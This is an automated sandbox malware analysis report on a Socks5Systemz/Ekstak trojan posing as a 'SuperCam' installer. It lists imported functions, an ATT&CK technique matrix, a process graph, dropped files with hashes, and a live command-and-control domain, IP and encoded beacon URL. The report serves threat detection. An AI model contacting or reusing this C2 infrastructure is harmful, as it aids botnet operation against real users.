                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,5_2_6096923E
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,5_2_6096A38C
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6096748C
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_609254B1
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6094B407
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6090F435 sqlite3_bind_parameter_index,5_2_6090F435
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,5_2_609255D4
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609255FF sqlite3_bind_text,5_2_609255FF
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,5_2_6094B54C
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60925686
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,5_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,5_2_609256E5
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6092562A sqlite3_bind_blob,5_2_6092562A
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,5_2_60925655
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6094C64A
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_609687A7
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,5_2_6092570B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F772
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_60925778
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6090577D sqlite3_bind_parameter_name,5_2_6090577D
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B764
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6090576B sqlite3_bind_parameter_count,5_2_6090576B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6094A894
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F883
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,5_2_6096281E
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,5_2_6096583A
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6094A92B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6090EAE5 sqlite3_transfer_bindings,5_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,5_2_6095FB98
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job2
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    2
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture112
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets251
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    Remote System Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    System Network Configuration Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580574 Sample: vc8Kx5C54G.exe Startdate: 25/12/2024 Architecture: WINDOWS Score: 100 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Multi AV Scanner detection for dropped file 2->44 46 9 other signatures 2->46 8 vc8Kx5C54G.exe 2 2->8         started        process3 file4 24 C:\Users\user\AppData\...\vc8Kx5C54G.tmp, PE32 8->24 dropped 11 vc8Kx5C54G.tmp 19 18 8->11         started        process5 file6 26 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 11->26 dropped 28 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 11->28 dropped 30 C:\Users\user\AppData\...\unins000.exe (copy), PE32 11->30 dropped 32 17 other files (10 malicious) 11->32 dropped 14 supercam360.exe 1 20 11->14         started        18 net.exe 1 11->18         started        process7 dnsIp8 38 ceijjfu.net 185.196.9.67, 49736, 49737, 49740 SIMPLECARRIERCH Switzerland 14->38 34 C:\ProgramDataShineEncoder\sqlite3.dll, PE32 14->34 dropped 36 C:\ProgramData\...ShineEncoder.exe, PE32 14->36 dropped 20 conhost.exe 18->20         started        22 net1.exe 1 18->22         started        file9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    vc8Kx5C54G.exe53%ReversingLabsWin32.Trojan.Sockssystemz
                    vc8Kx5C54G.exe51%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe100%Joe Sandbox ML
                    C:\ProgramData\EShineEncoder\EShineEncoder.exe100%Joe Sandbox ML
                    C:\ProgramData\EShineEncoder\EShineEncoder.exe74%ReversingLabsWin32.Trojan.Ekstak
                    C:\ProgramData\EShineEncoder\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\LTDIS13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\bjpeg23.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-1NCOM.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-A38H9.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-A5A81.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-C77TD.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-F7KI7.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-MQ3QG.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-QD1CQ.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\ltkrn13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe74%ReversingLabsWin32.Trojan.Ekstak
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\uninstall\is-MF7B1.tmp4%ReversingLabs
                    C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\uninstall\unins000.exe (copy)4%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp4%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    ceijjfu.net0%Avira URL Cloudsafe
                    http://ceijjfu.net/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d320%Avira URL Cloudsafe
                    http://185.196.9.67/0%Avira URL Cloudsafe
                    http://185.196.9.67/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df140%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ceijjfu.net
                    185.196.9.67
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      ceijjfu.nettrue
                      • Avira URL Cloud: safe
                      unknown
                      http://ceijjfu.net/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/vc8Kx5C54G.tmp, vc8Kx5C54G.tmp, 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MF7B1.tmp.1.dr, vc8Kx5C54G.tmp.0.drfalse
                        high
                        http://www.remobjects.com/psUvc8Kx5C54G.exe, 00000000.00000003.1674056082.0000000002320000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000003.1674199169.00000000020F8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MF7B1.tmp.1.dr, vc8Kx5C54G.tmp.0.drfalse
                          high
                          http://www.remobjects.com/psvc8Kx5C54G.exe, 00000000.00000003.1674056082.0000000002320000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000003.1674199169.00000000020F8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, vc8Kx5C54G.tmp, 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MF7B1.tmp.1.dr, vc8Kx5C54G.tmp.0.drfalse
                            high
                            https://www.easycutstudio.com/support.htmlvc8Kx5C54G.exe, 00000000.00000003.1673765629.00000000020F1000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000003.1673699391.0000000002320000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000002.2919435024.00000000020F1000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000002.2919530378.0000000000847000.00000004.00000020.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000002.2919773684.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000003.1675748927.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000003.1675681601.00000000030F0000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              http://185.196.9.67/supercam360.exe, 00000005.00000002.2919541859.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://185.196.9.67/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14supercam360.exe, 00000005.00000002.2920428954.00000000033BA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.196.9.67
                              ceijjfu.netSwitzerland
                              42624SIMPLECARRIERCHtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1580574
                              Start date and time:2024-12-25 09:16:06 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:vc8Kx5C54G.exe
                              renamed because original name is a hash value
                              Original Sample Name:2a64b62e8ed1c42a2487233e83d9966d.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@10/31@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 90%
                              • Number of executed functions: 170
                              • Number of non-executed functions: 286
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              03:17:33API Interceptor392332x Sleep call for process: supercam360.exe modified
                              No context
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SIMPLECARRIERCHzmap.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.mips.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.x86.elfGet hashmaliciousOkiruBrowse
                              • 185.196.11.47
                              zmap.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              debug.dbg.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.arm.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              zmap.spc.elfGet hashmaliciousMirai, OkiruBrowse
                              • 185.196.11.47
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\ProgramData\EShineEncoder\sqlite3.dllEQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                  vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                      r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                        gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                          gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                            Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                              steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                  Process:C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3562941
                                                  Entropy (8bit):6.411850629570214
                                                  Encrypted:false
                                                  SSDEEP:49152:FyUj5KcWyXZVa42TBlqEbIWUKKf9d22/dR5w7V9R:VjDhXm4m7qE8WUKKFd28dn09R
                                                  MD5:002737DAE0350F10594A62D75616F208
                                                  SHA1:69A75EA2CF12DAED3F64B08425DB0EA3CDA3CD9C
                                                  SHA-256:29109C7A1CF153A50D2E7BA1073F9CB7BA68D8F8CAA9E4C5880C21EC354A9501
                                                  SHA-512:B0024C4E5D90916BCAFC234C45CE240600AA272998D45D2292E2338385735835F4C727B7529C4FE4F4FFD114791B58C1434E1DC4C30D69E21450BF986D68098A
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L......L.....................Z....................@...........................6.......6.....................................4...,.......................................................................................\............................rsti3.............................. ..`.rstj3..V/.......0..................@..@.rstk3...d...0...0... ..............@....rsrc................P..............@..@.rstl3...J"..p...I".................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):645592
                                                  Entropy (8bit):6.50414583238337
                                                  Encrypted:false
                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
